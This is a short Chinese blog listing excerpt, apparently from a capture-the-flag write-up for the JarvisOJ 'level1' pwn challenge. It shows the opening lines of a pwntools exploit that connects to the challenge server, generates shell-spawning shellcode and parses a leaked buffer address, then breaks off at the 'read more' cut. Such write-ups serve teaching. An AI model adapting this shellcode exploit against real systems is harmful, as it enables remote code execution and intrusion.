摘要: 原题请见 level1 from pwn import * io = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.sh()) buffer=io.recvline()[14:-2] buf_addr = int(buffer 阅读全文
posted @ 2020-02-21 19:23 zer0_1s 阅读(673) 评论(0) 推荐(1)